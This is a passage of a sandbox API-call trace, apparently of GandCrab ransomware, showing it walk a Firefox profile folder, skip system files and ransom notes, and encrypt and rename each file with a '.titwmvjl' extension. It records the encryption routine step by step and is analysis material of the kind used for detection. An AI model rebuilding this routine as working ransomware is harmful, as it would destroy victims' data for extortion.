"c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\key3.db.titwmvjl"), dwFlags=0x1) returned 1 [0082.631] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.632] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0082.632] lstrcmpW (lpString1="kinto.sqlite", lpString2=".") returned 1 [0082.632] lstrcmpW (lpString1="kinto.sqlite", lpString2="..") returned 1 [0082.632] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="kinto.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite" [0082.632] lstrlenW (lpString=".titwmvjl") returned 9 [0082.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned 92 [0082.632] VirtualAlloc (lpAddress=0x0, dwSize=0xf8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.632] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite.titwmvjl") returned 101 [0082.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned 92 [0082.632] lstrlenW (lpString=".sqlite") returned 7 [0082.632] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.632] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".sqlite ") returned 8 [0082.632] lstrcmpiW (lpString1=".sqlite", lpString2=".titwmvjl") returned -1 [0082.632] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned 92 [0082.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned 92 [0082.632] lstrcmpiW (lpString1="kinto.sqlite", lpString2="desktop.ini") returned 1 [0082.632] lstrcmpiW (lpString1="kinto.sqlite", lpString2="autorun.inf") returned 1 [0082.632] lstrcmpiW (lpString1="kinto.sqlite", lpString2="ntuser.dat") returned -1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="iconcache.db") returned 1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="bootsect.bak") returned 1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="boot.ini") returned 1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="ntuser.dat.log") returned -1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="thumbs.db") returned -1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="CRAB-DECRYPT.html") returned 1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="ntldr") returned -1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="NTDETECT.COM") returned -1 [0082.633] lstrcmpiW (lpString1="kinto.sqlite", lpString2="Bootfont.bin") returned 1 [0082.633] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned 92 [0082.633] lstrlenW (lpString=".sqlite") returned 7 [0082.633] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.633] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0082.633] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.633] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.633] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\kinto.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0082.634] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.634] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0082.753] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.754] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0082.757] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.757] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.757] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.757] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0082.757] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.757] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.757] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.758] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.758] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0082.760] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.761] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.761] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.761] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0082.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.761] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.761] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.761] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.761] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0082.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.764] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5032f8) returned 1 [0082.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.764] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.765] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.765] GetLastError () returned 0x0 [0082.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.765] CryptDestroyKey (hKey=0x5032f8) returned 1 [0082.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.765] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.765] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0082.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.768] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0082.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.768] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0082.768] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.769] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0082.769] GetLastError () returned 0x0 [0082.769] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.769] CryptDestroyKey (hKey=0x503738) returned 1 [0082.769] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.769] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.769] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0082.769] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0082.770] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0x100000, lpOverlapped=0x0) returned 1 [0082.932] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.932] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0x100000, lpOverlapped=0x0) returned 1 [0082.957] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.957] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0082.968] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.972] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.978] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.979] CloseHandle (hObject=0x2d4) returned 1 [0082.979] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\kinto.sqlite"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\kinto.sqlite.titwmvjl"), dwFlags=0x1) returned 1 [0082.980] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.981] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0082.981] lstrcmpW (lpString1="mimeTypes.rdf", lpString2=".") returned 1 [0082.981] lstrcmpW (lpString1="mimeTypes.rdf", lpString2="..") returned 1 [0082.981] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="mimeTypes.rdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf" [0082.981] lstrlenW (lpString=".titwmvjl") returned 9 [0082.981] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned 93 [0082.981] VirtualAlloc (lpAddress=0x0, dwSize=0xfa, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.981] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf.titwmvjl") returned 102 [0082.981] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned 93 [0082.981] lstrlenW (lpString=".rdf") returned 4 [0082.981] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.982] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".rdf ") returned 5 [0082.982] lstrcmpiW (lpString1=".rdf", lpString2=".titwmvjl") returned -1 [0082.982] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.982] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned 93 [0082.982] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned 93 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="desktop.ini") returned 1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="autorun.inf") returned 1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="ntuser.dat") returned -1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="iconcache.db") returned 1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="bootsect.bak") returned 1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="boot.ini") returned 1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="ntuser.dat.log") returned -1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="thumbs.db") returned -1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="KRAB-DECRYPT.html") returned 1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="CRAB-DECRYPT.html") returned 1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="KRAB-DECRYPT.txt") returned 1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="CRAB-DECRYPT.txt") returned 1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="ntldr") returned -1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="NTDETECT.COM") returned -1 [0082.982] lstrcmpiW (lpString1="mimeTypes.rdf", lpString2="Bootfont.bin") returned 1 [0082.982] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf") returned 93 [0082.982] lstrlenW (lpString=".rdf") returned 4 [0082.982] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.983] wsprintfW (in: param_1=0x2310000, param_2="%s " | out: param_1=".rdf ") returned 5 [0082.983] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.983] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.983] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\mimetypes.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0082.984] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.984] ReadFile (in: hFile=0x2d4, lpBuffer=0x2310000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0082.992] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.992] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.992] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0082.995] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0082.996] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0082.996] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0082.996] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0082.996] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.996] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0082.996] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.997] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0082.997] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4c9980) returned 1 [0083.000] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2320000 [0083.000] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0083.001] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0083.001] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0083.001] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.001] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.001] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.001] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.001] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.005] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.005] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503438) returned 1 [0083.005] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.006] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.006] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.006] GetLastError () returned 0x0 [0083.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.006] CryptDestroyKey (hKey=0x503438) returned 1 [0083.006] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.006] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.007] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.007] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4c9980) returned 1 [0083.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.010] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503578) returned 1 [0083.010] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.011] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0083.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.011] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2310100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2310100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0083.011] GetLastError () returned 0x0 [0083.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.011] CryptDestroyKey (hKey=0x503578) returned 1 [0083.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0083.012] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0083.012] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000 [0083.012] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0083.012] ReadFile (in: hFile=0x2d4, lpBuffer=0x2320000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2320000*, lpNumberOfBytesRead=0x259e78c*=0xf23, lpOverlapped=0x0) returned 1 [0083.025] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffff0dd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.025] WriteFile (in: hFile=0x2d4, lpBuffer=0x2650000*, nNumberOfBytesToWrite=0xf23, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesWritten=0x259e770*=0xf23, lpOverlapped=0x0) returned 1 [0083.058] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.058] WriteFile (in: hFile=0x2d4, lpBuffer=0x2310000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2310000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0083.059] VirtualFree (lpAddress=0x2320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.063] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.063] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.063] CloseHandle (hObject=0x2d4) returned 1 [0083.064] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\mimetypes.rdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\mimeTypes.rdf.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\mimetypes.rdf.titwmvjl"), dwFlags=0x1) returned 1 [0083.064] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.065] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0083.065] lstrcmpW (lpString1="minidumps", lpString2=".") returned 1 [0083.065] lstrcmpW (lpString1="minidumps", lpString2="..") returned 1 [0083.065] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps" [0083.065] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\" [0083.065] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0083.065] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0083.065] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 